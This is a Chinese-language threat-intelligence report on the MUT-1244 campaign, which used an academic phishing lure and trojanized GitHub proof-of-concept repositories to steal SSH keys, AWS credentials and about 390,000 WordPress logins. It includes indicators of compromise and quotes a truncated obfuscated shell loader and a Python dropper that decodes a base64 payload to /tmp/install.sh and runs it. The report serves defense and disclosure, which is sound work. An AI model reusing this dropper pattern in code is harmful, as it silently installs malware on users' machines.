揭秘MUT-1244 两大持续攻击活动（如何收割39万受害者）

要点和观察

• 在这篇文章中，我们描述了对一个威胁行为者的深入调查，我们为其分配了标识符MUT-1244。

• MUT-1224 使用两个初始访问向量来危害受害者，均利用相同的第二阶段负载：针对数千名学术研究人员的网络钓鱼活动和大量木马化的 GitHub 存储库，例如用于利用已知 CVE 的概念验证代码。

• 超过 390,000 个凭证（据信属于 WordPress 帐户）已通过木马“yawpp”GitHub 项目中的恶意代码泄露给威胁行为者，伪装成 WordPress 凭证检查器。

• 数百名 MUT-1244 受害者曾经并仍在遭受攻击。受害者被认为是攻击者，包括渗透测试人员、安全研究人员以及恶意威胁行为者，并且 SSH 私钥和 AWS 访问密钥等敏感数据已被泄露。

• 我们评估 MUT-1244 与先前研究中跟踪的针对恶意 npm 包0xengine/xmlrpc和恶意 GitHub 存储库的活动有重叠hpc20235/yawpp。

我们要感谢SpyCloud团队对本研究的支持。

概括

安全专业人员是威胁行为者的重要目标，因为他们往往拥有广泛的特权并处理敏感信息。2022 年，荷兰莱顿大学的一支团队发布了一篇研究论文，表明攻击者通常会发布虚假的、木马化的漏洞代码，希望有人会运行它。最近，Uptycs和SonicWall的研究显示了这些攻击的机会主义性质，威胁行为者会在流行漏洞被披露时发布虚假的概念验证漏洞代码。

11 月下旬，有报告 讨论了恶意 npm 包0xengine/xmlrpc以及相关的 GitHub 存储库 。hpc20235/yawpp该报告还描述了托管在 的第二阶段有效载荷，https://codeberg[.]org/k0rn66/xmrdropper与其名称相反，它的作用不仅仅是更新加密货币矿工；它还会在系统中植入后门，并将系统信息、私人 SSH 密钥、环境变量和选定文件夹（例如~/.aws）的内容泄露给文件共享服务 file[.]io。

在这篇文章中，我们分享了对这个被称为 MUT-1244 的威胁行为者的调查结论。我们使用“MUT”（神秘的未归因威胁）名称来跟踪未归因于已知威胁行为者的集群。通过利用开源情报 (OSINT) 技术，我们能够揭示 MUT-1244 活动的全部范围。值得注意的是，攻击者利用了分布在网络钓鱼活动中的几种初始访问技术以及数十个木马化的 GitHub 存储库来传递相同的第二阶段有效载荷。我们的调查还发现，MUT-1244 能够通过入侵有权访问这些凭据的无关威胁行为者来窃取超过 390,000 个凭据，据信这些凭据是 WordPress 网站的帐户。

初始访问向量

MUT-1244 使用两种主要方法来传递相同的恶意第二阶段负载：网络钓鱼活动和在 GitHub 上发布的攻击工具。后一种方法有几种变体，我们将在下面详细介绍。

虚假内核升级钓鱼活动

攻击者留下了一个公开的 Git 存储库，其中包含针对学术界的网络钓鱼活动的详细信息。该存储库包含网络钓鱼电子邮件本身，以及从研究论文平台 arXiv 抓取的 2,758 封目标电子邮件的数据库。网络钓鱼电子邮件的标题为“通知：高性能计算 (HPC) 用户收件箱的重要 CPU 微代码更新”，并要求受害者安装虚假的内核升级。

当点击该链接时，受害者会被引导至https://www.opencompiled[.]org/patches/cpu-microcode-2024-09-21.html。虽然此 URL 已被删除，但我们能够从历史记录中收集到屏幕截图：

然后，受害者会看到一个页面，要求他们复制并粘贴一段恶意代码。据我们所知，这是第一个有记录的针对 Linux 系统的“ ClickFix ”类型攻击。当受害者执行恶意命令时，patch-mc-0x129.shGitHub 存储库中的脚本opencompiled-oss/kernel-patch就会被执行。虽然该脚本已被删除，但我们能够通过 Bing 缓存检索其内容。该脚本会释放与原始文章中报告的相同的第二阶段，托管在https://codeberg[.]org/k0rn66/xmrdropper。

z="
";xBz='ce >';rDz='$APP';VCz='CAL_';iDz='edBy';aBz='-m)'<snip>
eval "$Az$Bz$Cz$Dz$Ez$Fz$Gz$Hz$Iz$Jz$Kz$Lz$z$Mz$Nz$Oz<snip>

我们联系了部分目标用户，并确认该电子邮件是在 2024 年 10 月 5 日至 2024 年 10 月 21 日的时间窗口内发送的。我们在附件部分分享了观察到的发送 IP。

GitHub 上发布恶意攻击工具

MUT-1244 使用的第二个初始访问媒介是一组恶意 GitHub 用户，他们发布虚假的 CVE 概念验证。我们观察到，这数十名用户形成了一个群体，经常为彼此的存储库加注星标和分叉。他们中的大多数都是在 10 月或 11 月创建的，没有任何合法活动，并且拥有 AI 生成的个人资料图片。

下面的交互式图表表示从GH Archive 数据集观察到的恶意用户之间的交互（星号和分叉） 。将鼠标悬停在存储库或用户上可查看更多详细信息。全屏版本可在此处获取。

去年 10 月， LinkedIn上的一名研究人员发现了两个被木马感染的存储库。下面，我们将深入研究并揭露 49 个被木马感染的 GitHub 存储库，这些存储库使用四种不同的技术进行初始访问。

恶意 GitHub 用户和存储库的完整列表可在附件中找到。所有恶意提交的提交者名称和 ProtonMail 地址都为。这些特征使得使用GH Archiverobert数据集可以轻松大规模识别与 MUT-1244 相关的提交（包括已删除的存储库）。

这数十个恶意 GitHub 存储库是针对已知漏洞的概念验证漏洞的木马版本。存储库名称包括：

• 漏洞概述

• cve-2001-1473

• 可执行文件-pdf

• cve-2019-11248

由于其命名，这些存储库中的几个会自动包含在合法来源中，例如 Feedly Threat Intelligence 或 Vulnmon，作为这些漏洞的概念验证存储库。这增加了它们的合法性以及有人运行它们的可能性。

注意：Feedly 和 Vulnmon 等服务不保证这些内容的合法性。运行来自未知来源的概念验证代码时请务必小心谨慎。

所有这些存储库最终都会投放与最初报道相同的第二阶段有效载荷。然而，它们以几种不同的方式实现这一点。

方法一：后门configure编译文件

多个存储库（包括）嵌入了合法且可能有效的漏洞。然而，它们在45,000行文件m00n3rrr/poc-CVE-2001-1473的中间包含一个后门，该文件似乎用于编译目的。configure

此有效载荷与“内核升级”网络钓鱼活动中的有效载荷相同，解码后的结果与所使用的相同0xengine/xmlrpc，从而释放相同的第二阶段有效载荷。

方法 2：隐藏在 PDF 文件中的恶意负载

一些其他存储库（例如r3s3tt/CVE-2021-31755或g1thubb002/poc-CVE-2020-35489）将恶意负载嵌入二进制文件（例如 PDF）中。然后，伪造的漏洞代码会提取并执行它。

方法 3：使用 Python dropper

一些存储库（例如aib0litt/poc-CVE-2020-1938）复制了合法的漏洞代码并插入了解码 base64 编码的有效负载的后门，然后将其写入磁盘并执行。

def generate_payload(host, req_uri):
encoded_script = b"ej0iCiI7bEN6PSdQUklOJztYQ<SNIP>"
if os.name == 'posix':
try:
decoded_script = base64.b64decode(encoded_script)
script_path = '/tmp/install.sh'
with open(script_path, 'wb') as file:
file.write(decoded_script)
subprocess.run(['chmod', '+x', script_path], check=True)
result = subprocess.run(['bash', script_path], check=True, capture_output=True, text=True)
except subprocess.CalledProcessError as e:
print(f"Error occurred: {e.stderr}")

方法 4：包含恶意 npm 包

一些存储库（例如）通过在 package.json 中hpc20235/pdf-watermark-remover包含恶意 npm 包来间接感染受害者。0xengine/meow

对该包的分析（目前可在我们的开源数据集中找到）表明，它还通过解码嵌入的 base64 字符串、将其写入磁盘并执行它来投放相同的第二阶段有效负载。

类似地，hpc20235/yawpp嵌入原始的恶意 npm 包0xengine/xmlrpc：

{
  "dependencies": {
    "@0xengine/xmlrpc": "^1.3.18",
    "..."
}

意外发现硬编码凭证

npm包0xengine/xmlrpc和第二阶段有效负载包含几个硬编码凭证：

• Dropbox 访问令牌，具有列出和下载攻击者通过该0xengine/xmlrpc包窃取的文件的权限

• 服务令牌file[.]io，具有列出和下载第二阶段有效载荷窃取的文件的权限，适用于本文中描述的所有初始访问向量

我们评估：

• 截至撰写本文时，仍有数十台机器受到感染。

• MUT-1244 能够入侵数十名受害者的系统，其中大部分是红队成员、安全研究人员以及任何有兴趣下载 PoC 漏洞代码的人。

• 这使得 MUT-1244 能够访问敏感信息，包括私有 SSH 密钥、AWS 凭证和命令历史记录。经证实，许多受害者已经克隆并执行了木马化的 GitHub 存储库，从而证实了最初的感染媒介。

• MUT-1244 能够窃取凭证，据信这些凭证是超过 390,000 个 WordPress 网站的凭证。我们尚未验证这些凭证的有效性，但有强烈迹象表明它们确实与 Wordpress 网站有关。

在下一节中，我们将更详细地介绍如此大量凭证是如何被泄露的。

受木马病毒感染的凭证检查程序如何窃取超过 39 万份凭证

MUT-1244 能够访问超过 390,000 个凭证，据信这些凭证是 Wordpress 凭证。我们高度确信，在这些凭证被泄露到 Dropbox 之前，它们已落入攻击者手中，他们很可能是通过非法手段获取这些凭证的。然后，这些攻击者通过yawpp他们用来检查这些凭证有效性的工具遭到入侵。

由于 MUT-1244 被宣传yawpp为 WordPress 的“凭证检查器”，因此攻击者使用一组被盗凭证（通常从地下市场购买，以加快威胁行为者的行动）yawpp来验证它们也就不足为奇了。

结论

MUT-1244 调查突出了攻击者如何利用简单但有效的方法（如木马工具和网络钓鱼活动）来攻击安全专业人员和研究人员。这也提醒人们在使用前要保持警惕并彻底审查工具和来源。

感谢您的阅读！欢迎通过[email protected]与我们联系。您也可以在Bluesky上关注我们并订阅我们的月刊。

附件：入侵指标

钓鱼邮件：

• 主题：

Notification: Important CPU Microcode Update for High-Performance Computing (HPC) Users Inbox

• 观察到的发件人：[email protected]或[email protected]

• 可能的其他发件人：[email protected]

• 观察到的发送 IP 地址：94.156.177.14和37.120.193.124

• 预计发送日期：2024 年 10 月 5 日至 10 月 21 日

恶意 GitHub 用户：

0x3ngine  
0xget  
0zzzer  
aib0litt  
aifuzzer  
aitech66  
altereg0x1  
asmer2020  
baesh3r  
cpp4us  
enter0x13  
ethgeeks  
g1thubb001  
g1thubb002  
g1thubb004  
helmutkova1982  
hpc20235  
iqzer0  
m00n3rr  
m00n3rrr  
maryakov  
masm3264  
n0dej5  
n0s3ns33  
nod3jzzz  
nop2nop  
opencompiled-oss  
p1ton3rr  
paulmuller1977  
prj0cve  
r3s3tt  
reneww  
rocomenji44  
s3nd3rjz  
un1k00rn  
zipper2023

恶意 GitHub 存储库：

0x3ngine/xmrdropper  
0xget/cve-2001-1473  
aib0litt/poc-CVE-2020-1938  
aifuzzer/onlyfans  
aifuzzer/poc-CVE-2020-35489  
aifuzzer/pwnedu  
aifuzzer/roche-biochemical-pathways  
aitech66/bohemian-diffusion  
aitech66/executable-pdf  
aitech66/onlyfans  
aitech66/poc-CVE-2020-35489  
altereg0x1/poc-CVE-2019-11248  
baesh3r/poc-CVE-2023-3824  
cpp4us/cve-2019-11248  
enter0x13/poc-CVE-2024-5057  
ethgeeks/oneliners  
ethgeeks/qzip2  
g1thubb001/poc-CVE-2019-11248  
g1thubb002/poc-CVE-2020-35489  
g1thubb004/poc-CVE-2024-5057  
helmutkova1982/bohemian-diffusion  
hpc20235/gitlinkhunter  
hpc20235/pdf-watermark-remover  
hpc20235/qzip2  
hpc20235/qzip3  
hpc20235/yawpp  
m00n3rrr/poc-CVE-2001-147  
m00n3rrr/poc-CVE-2001-147"  
m00n3rrr/poc-CVE-2001-1473  
maryakov/executable-pdf  
maryakov/opencompiled.org  
masm3264/poc-CVE-2001-1473  
masm3264/poc-CVE-2019-11248  
masm3264/woocommerce-poc  
n0dej5/gitlinkhunter  
n0s3ns33/poc-cve-2023-21716  
nocomp/poc-CVE-2001-1473  
nod3jzzz/poc-CVE-2019-11248  
nop2nop/cve-2019-11248  
opencompiled-oss/opencompiled  
p1ton3rr/poc-cve-2001-1473  
paulmuller1977/pdf-watermark-remover  
prj0cve/woocommerce-rce  
prj0cve/yawpp  
r3s3tt/CVE-2021-31755  
reneww/poc-CVE-2020-25223  
rocomenji44/PDF-Watermark-Remover  
s3nd3rjz/poc-CVE-2020-1938  
un1k00rn/poc-CVE-2024-5057

注意：GitHub 已删除这些用户和存储库。这些列表可能并不详尽。

原文始发于微信公众号（OSINT研习社）：揭秘MUT-1244 两大持续攻击活动（如何收割39万受害者）